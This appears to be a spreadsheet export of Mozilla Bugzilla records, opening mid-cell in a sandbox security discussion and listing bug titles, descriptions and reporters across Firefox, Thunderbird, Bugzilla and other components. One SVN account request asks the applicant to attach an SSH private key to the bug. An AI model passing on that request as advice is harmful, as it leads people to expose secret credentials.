bug 321101 comment 20 describes one such solution. It has the advantage that all objects in the sandbox are created in the sandbox so following anybody's __proto__ or __parent__ chain won't get you anywhere. The major hurdle to that solution however is that a chrome function that returns an object (as opposed to a primitive such as a string) re-opens the hole. The patch in that bug attempts to use (basically) |return eval(uneval(rval))|. However this fails pretty quickly for native objects.
I'm filing this bug to find a solution that makes everybody happy (whether we continue with bug 321101's approach or find a better one).</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-482816</t>
  </si>
  <si>
    <t>[meta] browser dialogs don't fit in Fennec</t>
  </si>
  <si>
    <t>Many browser dialogs (warnings messages and some configuration ones) that we retain from Firefox don't really fit with the Fennec interaction model.  Often they're bigger than the screens on mobile devices they use finger-unfriendly controls like radio buttons and checkboxes and just generally don't fit with the look and feel of Fennec.
Many of them can be removed and their function put elsewhere in Fennec but there will likely still be a number of infrequently used dialogs that have to be better styled for Fennec.</t>
  </si>
  <si>
    <t>madhava</t>
  </si>
  <si>
    <t>CORE-229730</t>
  </si>
  <si>
    <t>change NS_IF_ADDREF to NS_ADDREF in nsNativeScrollbarFrame::FindScrollbar</t>
  </si>
  <si>
    <t>159       if (currContent &amp;&amp; currContent-&gt;Tag() == nsXULAtoms::scrollbar) {
160         *outContent = currContent
161         *outFrame = start
162         NS_IF_ADDREF(*outContent)
currContent can't be null on 160 because of 159 therefore *outContent can't be
null on 162.</t>
  </si>
  <si>
    <t>CORE-334588</t>
  </si>
  <si>
    <t>fontname and fontsize in printing.properties used inconsistently for header and footer</t>
  </si>
  <si>
    <t>Steps to reproduce (in en-US and most other locales):
1. Start/restart your browser.
1. Set your default serif font to something very distinctive.
2. Print any document.
3. Print again.
Expected results:
Header and footer stay the same.
Actual results:
The header and footer use Times the first time you print and your default serif font the second time you print.
This would be relatively easy to fix the issue is that the localization is loaded after the font is set.  However I doubt having it localized is actually useful.  Apparently at least a few of the localizations have translated the word serif which almost certainly does not give a useful result.
A list of how CVS locales' fontname differed from the en-US serif (the rest had fontname=serif the default serif font):
de: Uppercased
fi: Translated
he: Translated
hy-AM: Not sure
ko: Not sure
mk: Not sure
pl: Translated
ru: Not sure
sq: Uppercased
zh-CN: Not sure
No locale changed the default font size of 10.
From this I don't think having a localizable header/footer font is useful.
Not sure who to CC.</t>
  </si>
  <si>
    <t>THUNDERBIRD-713008</t>
  </si>
  <si>
    <t>Toolbars and Tabs</t>
  </si>
  <si>
    <t>Tabs shouldn't flicker when hovered</t>
  </si>
  <si>
    <t>Created attachment 583837
Hack
The first time a non-selected tab is hovered it flickers because the tab-hover-active.png image isn't loaded yet.
The attached patch reproduces the hack Firefox uses to work-around this: http://mxr.mozilla.org/mozilla-central/source/browser/themes/pinstripe/browser.css#1885</t>
  </si>
  <si>
    <t>CORE-450320</t>
  </si>
  <si>
    <t>Remove 'op' local variable from js_Interpret</t>
  </si>
  <si>
    <t>Created attachment 333470
First try patch
It would be nice to get rid of the 'op' local variable. I think it would help my work on bug 442379. In particular GCC seems to have a hard time optimizing this variable in the call-threading version because read-write dependences cross op dispatch. Also eventually I will want to stop updating regs.pc as well so this is a good first step.
The perf results look OK in SunSpider as well: 1% speedup overall. Most benchmarks are a few percent faster a few are a few percent slower. The worst is math-cordic which is 4.6% slower. I don't know why that happens but is may be that GCC doesn't CSE *regs.pc when it is used more than once in a case. We could consider applying that optimization manually.</t>
  </si>
  <si>
    <t>sunfish</t>
  </si>
  <si>
    <t>BUGZILLA-69533</t>
  </si>
  <si>
    <t>enter_bug.cgi does not auto-detect HP-UX as OS</t>
  </si>
  <si>
    <t>enter_bug.cgi correctly detects my HP as the platform however OS is always set
to other.  In pickos at line 207-208 there is a duplicated line for SunOS:
           /Mozilla.*\(.*.* SunOS.*\)/   }
           /Mozilla.*\(.*.* SunOS.*\)/   }
If you change the second to read
            /Mozilla.*\(.*.* HP-UX.*\)/   }
or even just add the line then the OS is correctly detected when the user is on
an HP.  Currently the HP-UX version is not detected that wouldn't be hard to
add if needed.</t>
  </si>
  <si>
    <t>CORE-6296</t>
  </si>
  <si>
    <t>accessing the name of an anchor crashes viewer</t>
  </si>
  <si>
    <t xml:space="preserve">Build: Win: 1999-05-11-09-M6  Mac: netscape5-mac-M6.sea.bin
OS tried:  Win98 WinNT Mac
- Go to above URL or use abbreviated code below.
- Reload a few times (takes only 1 or 2 reloads on Mac more on Windows)
- Mac: crashes system
- Windows: crashes viewer and makes machine unstable.
(Note: This test crashes the NGDriver test driver tool.)
Abbreviated code:
bug
&lt;A HREF=../testdata/test.gif NAME=anchor1 ALT=this is a test of the image
attribute&gt;Hi
  document.writeln(document.anchors.item(0).name)
</t>
  </si>
  <si>
    <t>vidur</t>
  </si>
  <si>
    <t>jcarpenter0524</t>
  </si>
  <si>
    <t>TOOLKIT-310071</t>
  </si>
  <si>
    <t>Downloads API</t>
  </si>
  <si>
    <t>Use system calls to add files to the recent documents folder</t>
  </si>
  <si>
    <t>We want to consider using the SHAddToRecentDocs call via the shell service to
add downloaded files to the recent documents folder on Windows.  There will be a
hidden boolean pref to disable this behaviour if desired.
This is a 2.0 enhancement and is a matter of playing nice with the system. 
Users concerned with privacy already have this disabled/hidden on their systems
since most Windows apps support this well.</t>
  </si>
  <si>
    <t>CORE-219444</t>
  </si>
  <si>
    <t>Setting zIndex with Javascript for an absolute positioned table doesn't work.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de-AT rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (X11 U Linux i686 de-AT rv:1.4) Gecko/20030624
I have two tables with position:absolute and the same z-index 10 set per css.
The second table is correctly drawn above the first. In a Javascript-function I
change the zIndex of table1 to 20. Now table1 should be above table2. This does
not happen.
Reproducible: Always
Steps to Reproduce:
open this page:
test
.bla {
	position:absolute
	border-color:red
	border-width:2px
	border-style:solid
	background-color:yellow
	z-index:10
}
#t1 {
	left:5px
	top:5px
}
#t2 {
	left:30px
	top:30px
}
function test() {
	document.getElementById(t1).style.zIndex=20
}
11111111111
11111111111
11111111111
11111111111
22222222222
22222222222
22222222222
22222222222
Actual Results:  
table t2 is above table t1.
Expected Results:  
table t1 should be above table t2.</t>
  </si>
  <si>
    <t>rosen</t>
  </si>
  <si>
    <t>FIREFOX-232467</t>
  </si>
  <si>
    <t>default folder for add bookmark not remembered across sessions when it's the Bookmarks folder</t>
  </si>
  <si>
    <t>Firebird 0.8.0+ 200401015 Windows XP
When you first open the browser and go to bookmark a page it chooses Bookmarks
Toolbar Folder and not Bookmarks. Bookmarks should be the default location
for saving of bookmarks.</t>
  </si>
  <si>
    <t>CORE-467123</t>
  </si>
  <si>
    <t>document.cloneNode() failed in a JS component</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20081128 Minefield/3.1b3pre (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20081128 Minefield/3.1b3pre
// In a JS component I load a DOM (from chrome://)
var vXhrComp = Components.classes[@mozilla.org/xmlextras/
xmlhttprequest1]
var vReq = vXhrComp.createInstance
(Components.interfaces.nsIXMLHttpRequest)
vReq.open(GET chrome://mychrome/content/myFile.xml false)
vReq.send(null)
var vXml = vReq.responseXML
//I want to backup my dom
var vXmlBackup = vXml.cloneNode(true)
The cloneNode failed : Security Error: Content at moz-nullprincipal:
{c0db3ee1-d7c3-47e4-b6d9-0a08830f15c9} may not load or link to //
chrome://mychrome/content/myFile.xml.
I think it's a problem with transfering nsIPrincipal to the new
Document.
In a xul page in chrome this code works fine. 
Reproducible: Always
Steps to Reproduce:
1. Install the xpi (see attached testcase)
2. In JSconsole write : window.openDialog(chrome://bugclonenode/content/ bugclonenode chrome resizable)
3. Click on the button : XHR load document : it's ok: 
4. Click a second time : call the cloneNode method on the already loaded Document : nok
It works in firefox 3.0.4 but the security warning is published (in the JsConsole).
In firefox 3.1 (and xulrunner 1.9.1) the cloneNode() throw an exception.</t>
  </si>
  <si>
    <t>sylvain.spinelli</t>
  </si>
  <si>
    <t>BUGZILLA-133210</t>
  </si>
  <si>
    <t>checksetup uses $::params</t>
  </si>
  <si>
    <t>In bug 96675 (R1.16 blocker) the patch uses $::params rather than $::param.</t>
  </si>
  <si>
    <t>jayvdb</t>
  </si>
  <si>
    <t>CALENDAR-351566</t>
  </si>
  <si>
    <t>Update Lightning install.rdf for 0.3 release</t>
  </si>
  <si>
    <t>Update Lightning install.rdf for 0.3
Todo:
- update em:version to 0.3
- disable support for Firefox
- update em:homepageURL to point to new release notes location
  --&gt; need to decide about new location first
Maybe ToDo:
- update em:creator: Mozilla Calendar Squad
  --&gt; What about Mozilla Calendar Squad and Contributors or
      Mozilla Calendar Developers and Contributors?
- update em:description An experimental calendar extension
  --&gt; be self-confident it's working now remove experimental?
      or leave it to emphasize pre 1.0 status?
  (It would be also nice if the description could be localized see
   http://kb.mozillazine.org/Localize_extension_descriptions)</t>
  </si>
  <si>
    <t>CORE-363747</t>
  </si>
  <si>
    <t>remove remaining Carbon apple event code replace lost functionality</t>
  </si>
  <si>
    <t>The old Carbon-based Apple Events code in xpfe/bootstrap/appleevents should not be built or linked into Cocoa configs it is redundant with Cocoa delegate-based handling added in 355352.
There are a couple technical problems that will need to be solved:
1) In toolkit/xre/nsCommandLineServiceMac.cpp ProcessAppleEvents() handles files passed by double-clicking on them. Not clear if removing the call will let the app delegate handle everything via odoc's.
2) The Carbon AE also purports to set up a bunch of scripting vocabulary that one might use to control browser from AppleScript. Not clear if any of this works or is expected to work (my guess is no to both).</t>
  </si>
  <si>
    <t>stanshebs</t>
  </si>
  <si>
    <t>BUGZILLA-253720</t>
  </si>
  <si>
    <t>Copying template from default to custom changes behavior</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040115
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040115
A local customization generates a user error (with ThrowUserError) which is not
in the list in the template global/user-error.html.tmpl so it shows up with the
default error not found string (expected) but on copying the template into
custom it gives an internal error instead.
Reproducible: Always
Steps to Reproduce:
1. Copy template default/global/user-error.html.tmpl to
custom/global/user-error.html
2. Generate an unhandled error type with ThrowUserError
Actual Results:  
Internal error Can't use string (global/user-error.html.tmpl: Per) as a HASH
ref while strict refs in use at 
/usr/lib/perl5/site_perl/5.8.3/i386-linux-thread-multi/Template/Provider.pm line
663.
Expected Results:  
The user error string [long error with spaces and punctuation] was not found.
Please send email to [maintainer] describing the steps taken to obtain this
message.</t>
  </si>
  <si>
    <t>shane.h.w.travis</t>
  </si>
  <si>
    <t>TOOLKIT-232587</t>
  </si>
  <si>
    <t>Trying to overwrite a file that does not contain a dot in its filename causes a hang</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7a) Gecko/20040129 Firebird/0.8.0+
The increment algorithm in the validateLeafName() function in nsHelperAppDlg.js
(and the equivalent code in contentAreaUtils.js) does not work if the filename
does not contain a dot. This bug causes Firebird to hang if you save an
extension-less file to a folder that already contains a file of the same name.
http://lxr.mozilla.org/mozilla/source/toolkit/mozapps/downloads/src/nsHelperAppDlg.js.in#254
Any file which does not already have a number appended will fail this test:
  var parts = /.+-(\d+)(\..*)?$/.exec(aLocalFile.leafName)
  if (parts) { ...
And will fallback to the else case unfortunately without a dot in the filename
the replace will fail:
  aLocalFile.leafName.replace(/\./ -1$
This means the filename will never increment and thus the condition in the while
can never be met and so FB goes into an infinite loop.
Reproducible: Always
Steps to Reproduce:
1. Make Save all files to this folder is selected in Options-&gt;Downloads
2. Visit the URL - http://www.pikey.me.uk/mozilla/test/dlbug.html
3. Right click the link and press Save Link to Disk
4. Repeat step 3
Actual Results:  
Firebird hangs
Expected Results:  
File should have been downloaded as file-1 in download folder
Originally reported in Bug 231371 Comment 8.
I have no idea if this counts as critical since it's so rare and I'm not sure if
this testcase will still work if I just attach both files to this bug (a html
file with a link to an extension-less file)?</t>
  </si>
  <si>
    <t>CORE-14752</t>
  </si>
  <si>
    <t xml:space="preserve">HTML elements do not have 'database' attribute when used with </t>
  </si>
  <si>
    <t>HTML elements do not have a 'database' attribute when used with a template.
This makes it impossible to dynamically modify the RDF datasources from which
content is generated for an HTML-rooted template.</t>
  </si>
  <si>
    <t>CORE-375517</t>
  </si>
  <si>
    <t>onerror in xbl sees ChromeWindow</t>
  </si>
  <si>
    <t>Created attachment 259781
mess6d.xml
onerror in xbl sees ChromeWindow
strange behaviour:
in xbl:
produces:
JavaScript error:  line 0: uncaught exception: onerror [object Window @ 0x8861808 (native @ 0x8862254)]
JavaScript error:  line 0: uncaught exception: onerror [object ChromeWindow @ 0x82dc420 (native @ 0x82beba4)]
JavaScript error:  line 0: uncaught exception: onerror [object Window @ 0x8861808 (native @ 0x8862254)]
trunk only.</t>
  </si>
  <si>
    <t>xbl</t>
  </si>
  <si>
    <t>guninski</t>
  </si>
  <si>
    <t>CORE-511750</t>
  </si>
  <si>
    <t>Factor out JavaScript Template Library</t>
  </si>
  <si>
    <t>Pull JSUtils contents out of jsvector.h so that it can be reused by future generic components.  Rename 'JSUtils' namespace to MFBT (= Mozilla Framework Based on Templates).  (Somewhat unrelated) parameterize JSTempVector by allocation/error-handling strategy to allow usage in both normal SM and nanojit.</t>
  </si>
  <si>
    <t>TOOLKIT-459329</t>
  </si>
  <si>
    <t>Download Manager won't compile without Vista SDK</t>
  </si>
  <si>
    <t>If you're using the MingW compiler then the download scanner is automatically excluded but --disable-vista-sdk-requirements does not have any effect.</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-482827</t>
  </si>
  <si>
    <t>Personas Plus</t>
  </si>
  <si>
    <t>remove reportSelection.label and reportSelection.title from localizations</t>
  </si>
  <si>
    <t>Once bug 482825 is fixed we'll no longer need the reportSelection.label localized string but strings are frozen for the 1.0 release so we can't remove it in conjunction with that bug.  We should do so after we unfreeze strings post 1.0.</t>
  </si>
  <si>
    <t>WEBSITES-403267</t>
  </si>
  <si>
    <t>bsmedberg's blog hacked spam in posts</t>
  </si>
  <si>
    <t>bsmedberg's blog has been hacked so it has spam in his last post and it's at the top of planet. I've pulled it from planet for now until bsmedberg can upgrade his WordPress change his passwords and remove the spam.
Sending        config.ini
Transmitting file data .
Committed revision 7961.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-442598</t>
  </si>
  <si>
    <t xml:space="preserve">SVN Account Request - Scott Robbin </t>
  </si>
  <si>
    <t>Scott needs an SVN account and access to /projects/labs.mozilla.com/ so he can check in future updates to the labs site design.
Scott -- need you to fill out a contributor form:
http://www.mozilla.org/hacking/committer/
(or more specifically it's here -- just read the above)
http://www.mozilla.org/hacking/committer/committers-agreement.pdf
Also need you to attach an SSH private key to this bug.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-477267</t>
  </si>
  <si>
    <t xml:space="preserve">SVN Account Request - Marien Zwart </t>
  </si>
  <si>
    <t>Having a subversion account would make maintaining the proxy connecting live chat to irc.mozilla.org easier. I will hopefully be filling out and sending the committer's agreement at the end of this week or beginning of the next one.</t>
  </si>
  <si>
    <t>marien.zwart</t>
  </si>
  <si>
    <t>FIREFOX-325763</t>
  </si>
  <si>
    <t>Remove calls to IsVoid</t>
  </si>
  <si>
    <t>When bug 324994 is done storage will call SetIsVoid on null strings so we won't have to. Remove the checks in places for this.</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-495281</t>
  </si>
  <si>
    <t>seeking client cert to use the MoMo  servers</t>
  </si>
  <si>
    <t>Created attachment 380205
My .csr file
+++ This bug was initially created as a clone of Bug #487713 +++
Summary says it all I think.</t>
  </si>
  <si>
    <t>CORE-364322</t>
  </si>
  <si>
    <t>Reference document on GC from Boehm has been moved.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en) AppleWebKit/418.9.1 (KHTML like Gecko) Safari/419.3
Build Identifier: 
I downloaded seamonkey-1.1b.source.tar. There is a file:
  gc/boehm/README
This says:
     (Both are also available from
     http://reality.sgi.com/boehm/papers/ among other places.)
There is nothing at this location. I think it can be found at:
     http://www.hpl.hp.com/personal/Hans_Boehm/gc/
Reproducible: Always</t>
  </si>
  <si>
    <t>BUGZILLA-477459</t>
  </si>
  <si>
    <t>buglist.cgi crashes for logged out users if the Reporter column is displayed</t>
  </si>
  <si>
    <t>On landfill if the Reporter column is displayed while I'm logged out buglist.cgi crashes:
http://landfill.bugzilla.org/bugzilla-tip-pg/buglist.cgi?quicksearch=%40myk
DBD::Pg::st execute failed: ERROR:  column map_reporter.login_name must appear in the GROUP BY clause or be used in an aggregate function
 [for Statement SELECT bugs.bug_id bugs.bug_severity bugs.priority bugs.bug_status bugs.resolution SUBSTRING(map_assigned_to.login_name FROM 1 FOR POSITION('@' IN map_assigned_to.login_name) - 1) bugs.bug_status bugs.resolution map_products.name bugs.short_desc SUBSTRING(map_reporter.login_name FROM 1 FOR POSITION('@' IN map_reporter.login_name) - 1) map_assigned_to.login_name FROM bugs  INNER JOIN profiles AS map_assigned_to ON (bugs.assigned_to = map_assigned_to.userid) INNER JOIN profiles AS map_reporter ON (bugs.reporter = map_reporter.userid) INNER JOIN products AS map_products ON (bugs.product_id = map_products.id) LEFT JOIN bug_status ON (bug_status.value = bugs.bug_status) LEFT JOIN priority ON (priority.value = bugs.priority) LEFT JOIN bug_group_map  ON bug_group_map.bug_id = bugs.bug_id  WHERE (( bugs.bug_status IN ('REOPENED''NEW''ASSIGNED''UNCONFIRMED') )) AND ((bugs.assigned_to IN (SELECT userid FROM profiles WHERE POSITION(LOWER('myk') IN LOWER(profiles.login_name)) &gt; 0))) AND bugs.creation_ts IS NOT NULL AND ((bug_group_map.group_id IS NULL)) GROUP BY bugs.bug_id bugs.bug_severity bugs.priority bugs.bug_status bugs.resolution map_products.name bugs.short_desc map_assigned_to.login_name bug_status.sortkey bug_status.value priority.sortkey priority.value ORDER BY bug_status.sortkeybug_status.valuepriority.sortkeypriority.valuemap_assigned_to.login_namebugs.bug_id] at /var/www/html/bugzilla-tip-pg/buglist.cgi line 1077
On my test installation the error message mentions map_assigned_to.login_name. I guess one would get the same error message if the QA contact column was displayed.
Also even if you don't display the Reporter column you still get the following error message (appears only every other time):
The custom sort order specified in your cookie contains an invalid column name map_assigned_to.login_name. The cookie has been cleared. This error is only displayed for logged out users. So I'm pretty sure that's a regression due to bug 219021.</t>
  </si>
  <si>
    <t>CORE-456028</t>
  </si>
  <si>
    <t>GFX: Color Management</t>
  </si>
  <si>
    <t>Need x86-64 Optimization for module/lcms</t>
  </si>
  <si>
    <t>Created attachment 339436
patch v1
Current LCMS has 2 problems for x86-64 platform.
- no SSE2 optimization.  Current is for x86 only.
- sizeof(DWORD) != 4.  Don't use long as 32bit value.</t>
  </si>
  <si>
    <t>m_kato</t>
  </si>
  <si>
    <t>CORE-77153</t>
  </si>
  <si>
    <t>Need to update XPCOM samples to reflect correct modern usage</t>
  </si>
  <si>
    <t>I mean we use NSGetFactory.  Gimme a break.</t>
  </si>
  <si>
    <t>CORE-314759</t>
  </si>
  <si>
    <t>ASSERTION: title not in head: 'mCurrentContext == mHeadContext'</t>
  </si>
  <si>
    <t>See testcase when having this:
I get an assertion in current debug build. Notice the missing '&gt;' in the 
###!!! ASSERTION: title not in head: 'mCurrentContext == mHeadContext' file c:/
mozilla/mozilla/content/html/document/src/nsHTMLContentSink.cpp line 2980</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-139695</t>
  </si>
  <si>
    <t>French</t>
  </si>
  <si>
    <t>virginmega.fr - site is IE only</t>
  </si>
  <si>
    <t>the new virgin site is IE only.
it redirects you to a page saying you should use IE to browse the site.</t>
  </si>
  <si>
    <t>french</t>
  </si>
  <si>
    <t>mpillard</t>
  </si>
  <si>
    <t>MOZILLA.ORG-193279</t>
  </si>
  <si>
    <t>Applying for a CVS write access - Philip Zhao</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U SunOS i86pc en-US rv:1.2.1) Gecko/20030107
Build Identifier: Mozilla/5.0 (X11 U SunOS i86pc en-US rv:1.2.1) Gecko/20030107
I have worked on mozilla for several months most interested in mailnews project.
After being acquainted with mozilla code and the architectures used in mozillaI
have added some patch whose check-in always needs other's help. 
Now I think I'm familiar with mailnews related code and othe mozilla code which
might affect with my work and all the ordinary rules to write a patch check-in
build mozilla and other related processes and I have produced a good coding
practices. So I need a CVS write access for further work. I list the bugs I
worked on in the past belowsome of which need your r&amp;sr.
1. bug 148083 : reviewer: bienvenu superreviewer: Henry Jia. checked in trunk.
2. bug 120188 : reviewer: Henry Jia superreviewer:sspitzer. checked in.
sspitzer updated it when check-in.
3. bug 160586 : reviewer: bienvenu superreviewer: Henry Jia. Wanting for check-in.
4. bug 166603 : sr=?
5. bug 154778 : s=?&amp;sr=?
6. bug 71383 :  s=?&amp;sr=?
7. bug 160291 : s=?&amp;sr=?
The CVS write access will make me more convenient in future work. Thanks.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-139439</t>
  </si>
  <si>
    <t>nordea.lu - javascript menu appearas as text</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win98 de-AT rv:0.9.9) Gecko/20020311
BuildID:    2002031104
The links of the javascript menu appears as text on top of page.
Reproducible: Always
Steps to Reproduce:
1. Goto to:
http://www.nordea.lu/sitemod/Moduler/frontrunner/fund_information_de/index.asp?pid=23072
2. Click on: Ich habe die rechtlichen Hinweise zur Kenntnis genommen</t>
  </si>
  <si>
    <t>freund</t>
  </si>
  <si>
    <t>THUNDERBIRD-300834</t>
  </si>
  <si>
    <t>Add a pref for host names which can bypass the remote image settings phishing etc. (mail.trusteddomains)</t>
  </si>
  <si>
    <t>We should allow enterprise customers to set a hidden pref which lists a set of
hostnames which should allow a remote image that originates from that host to load.
This will allow them to use the remote image blocker without their users seeing
the blocked remote images bar for company mail where the images reside on their
intranet.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-493574</t>
  </si>
  <si>
    <t>Consolidate RelEng bugzilla components</t>
  </si>
  <si>
    <t>Can you please remove the following components:
mozilla.org:ReleaseEngineering:Talos
mozilla.org:ReleaseEngineering:Maintenance
webtools:TryServer
...and consolidate any open/closed bugs from those components into mozilla.org:ReleaseEngineering ?</t>
  </si>
  <si>
    <t>CORE-413063</t>
  </si>
  <si>
    <t>Crash [@ nsCellMapColumnIterator::GetNextFrame] with  display:table-footer-group rowspan=0</t>
  </si>
  <si>
    <t>Created attachment 297908
testcase (crashes Firefox when loaded)
The crash is similar to the crash in bug 393936 but this clearly isn't an imagelib bug because there are no images involved.</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID-791475</t>
  </si>
  <si>
    <t>Android updater notification should provide more information like progress</t>
  </si>
  <si>
    <t>The Android service-based updater implemented in bug 786380 should at least show the progress so the user can see when it will be done/he can restart for getting latest version. Time remaining and download size are two other things which should be evaluated.</t>
  </si>
  <si>
    <t>mtp.boon</t>
  </si>
  <si>
    <t>WEBSITES-407151</t>
  </si>
  <si>
    <t>Please add Marco Zehe's blog feed to planet</t>
  </si>
  <si>
    <t>http://www.marcozehe.de/feed/
Marco Zehe has been in the Mozilla Community for a few months but has already made a huge impact improving accessibility. Although his blog is young he will be blogging about the upcoming beta 2 releases soon and it would be great to get these fed to the planet soon.</t>
  </si>
  <si>
    <t>dbolter</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-395221</t>
  </si>
  <si>
    <t>Add Ukrainian to the Firefox build trunk and branch</t>
  </si>
  <si>
    <t>Ukrainian needs to be added to the build. 'nuff said.</t>
  </si>
  <si>
    <t>CORE-310848</t>
  </si>
  <si>
    <t>Lots of nested lists effectively make pageload O(N^2)</t>
  </si>
  <si>
    <t>This happens with attachment 157457 which is on bug 256311 (the minimal
testcase 168 kb  between body tags hanging attachment).  That page has
lots of nested  tags.
The problem is that we have the following rule in html.css:
339 /* nested lists have no top/bottom margins */
340 ul ul   ul ol   ul dir   ul menu   ul dl
341 ol ul   ol ol   ol dir   ol menu   ol dl
342 dir ul  dir ol  dir dir  dir menu  dir dl
343 menu ul menu ol menu dir menu menu menu dl
344 dl ul   dl ol   dl dir   dl menu   dl dl {
345   margin-top: 0
346   margin-bottom: 0
347 }
So for each dl we walk every single ancestor (eg to see whether it matches |ul
dl|) constructing RuleProcessorData structs as we go.  Which makes the whole
thing O(N^2) in number of lists (in particular the number of times
RuleProcessorData() is called is O(N^2)).
Granted this is a pathological case and perhaps lazy population of
RuleProcessorData (which I can't find the bug for) would help enough here.</t>
  </si>
  <si>
    <t>CORE-22733</t>
  </si>
  <si>
    <t>window position collides with taskbar at top of screen</t>
  </si>
  <si>
    <t>Under win9x and winnt I have my taskbar on top like the Mac.
If I start Mozilla or open a new window of Mozilla the window will
be at the top with part of the window under the taskbar.
Can it be changed such that it will open a new window or start off with a
slight offset from the task bar and/or in maximise mode</t>
  </si>
  <si>
    <t>slok00</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-501128</t>
  </si>
  <si>
    <t>mozilla-europe.org</t>
  </si>
  <si>
    <t>[l10n] In 3.5 features page for no locale get firefox 3.5 not translated</t>
  </si>
  <si>
    <t>In 3.5 features page for no locale Get firefox 3.5 is not translated and appears in English (on top of the download button)</t>
  </si>
  <si>
    <t>lebedel.delphine</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-437545</t>
  </si>
  <si>
    <t>make Firefox awards graphic clickable</t>
  </si>
  <si>
    <t>This is a very small thing but I'd like the awards graphic on the Firefox page to be a clickable link. It should point to https://www-firefox3.authstage.mozilla.com/en-US/press/awards.html.
Thanks!</t>
  </si>
  <si>
    <t>jslater</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-210902</t>
  </si>
  <si>
    <t>Old nib files in camino/PreferencePanes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5a) Gecko/20030610 Camino/0.7+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5a) Gecko/20030610 Camino/0.7+
There are duplicate old versions of the nib files for some of the Camino
Preference panes. For example there is an old version of Privacy.nib in
camino/PreferencePanes/Privacy even though the current version of the nib is in
camino/PreferencePanes/Privacy/English.lproj. This is confusing because I
managed to get confused.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>the_great_spam_bin</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-524027</t>
  </si>
  <si>
    <t>Create graphics for Time Available tab on Get Involved page</t>
  </si>
  <si>
    <t>It would be nice to have some graphics for the content in the Time Available tab -- specifically for the 'A Few Minutes' 'A Few Hours' and 'A Few Weeks or More' sections.</t>
  </si>
  <si>
    <t>davidwboswell</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-293289</t>
  </si>
  <si>
    <t>Grab feeds serially</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.7) Gecko/20050416 Fedora/1.0.3-1.3.1 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.7) Gecko/20050416 Fedora/1.0.3-1.3.1 Firefox/1.0.3
Thunderbird should grab rss/atom feeds as serial http connections to servers. 
Making connections in paralled thunderbird uses all of cpu for seconds couses
desktop going to die.
Reproducible: Always
Steps to Reproduce:
1. Make an RSS News and Blogs account and add a lot of feeds to the account.
2. In Account Settings mark Check for new articles at startup.
3. Close Thunderbird and open it again.
Actual Results:  
CPU usage as 100 for seconds.
Expected Results:  
Checking for new articles with a little delay but don't use all of cpu.
It's not necessary to mark checking at startup then you should wait until TB
goes to check for new articles in XX minutes.</t>
  </si>
  <si>
    <t>SEAMONKEY-177608</t>
  </si>
  <si>
    <t>Accelerators needed for Account Wizard's 1st dialog (New Account Setup dialog)</t>
  </si>
  <si>
    <t>Buffy trunk build 2002-10-20-06: WinMe Linux 8 Mac 10.1.3
Overview: According to the Account Setup specification the Account Wizard
dialogs should have accelerators. Most of the dialogs now have accelerators
except for the very first one.
Steps to reproduce:
1. Open the Account Settings dialog
2. Select the New Account button
Actual Results: The New Account Setup dialog appears listing the various types
of accounts that may be created. It has no accelerators.
Expected Results: The accelerators should be present for all choices and
working. Please refer to the Account Setup UI Spec
(http://mozilla.org/mailnews/specs/accounts/#Wizard)</t>
  </si>
  <si>
    <t>nbaca</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-212012</t>
  </si>
  <si>
    <t>a1wireless.com -  claims that it is not compatible with the UNIX platform</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux ppc en-US rv:1.4) Gecko/20030630
Build Identifier: Mozilla/5.0 (X11 U Linux ppc en-US rv:1.4) Gecko/20030630
The web site http://www.a1wireless.com/ claims that it is not compatible with
the UNIX platform.  Specifically the above URL contains: A1Wireless.com is not
compatible with UNIX platform.
Please call our representatives for information or to place an order by phone.
Our Toll Free Number # 1-866-421-9473.
We regret the inconvenience.
Reproducible: Always
Steps to Reproduce:
1. Load http://www.a1wireless.com/ in Mozilla running on Linux/Unix.
2. Notice the above message (in the details section)
3. Go somewhere else? )
Actual Results:  
Cannot browse www.a1wireless.com web site
Expected Results:  
Loaded the web site like is done in other browsers/OSs.</t>
  </si>
  <si>
    <t>mattc</t>
  </si>
  <si>
    <t>NSS-501605</t>
  </si>
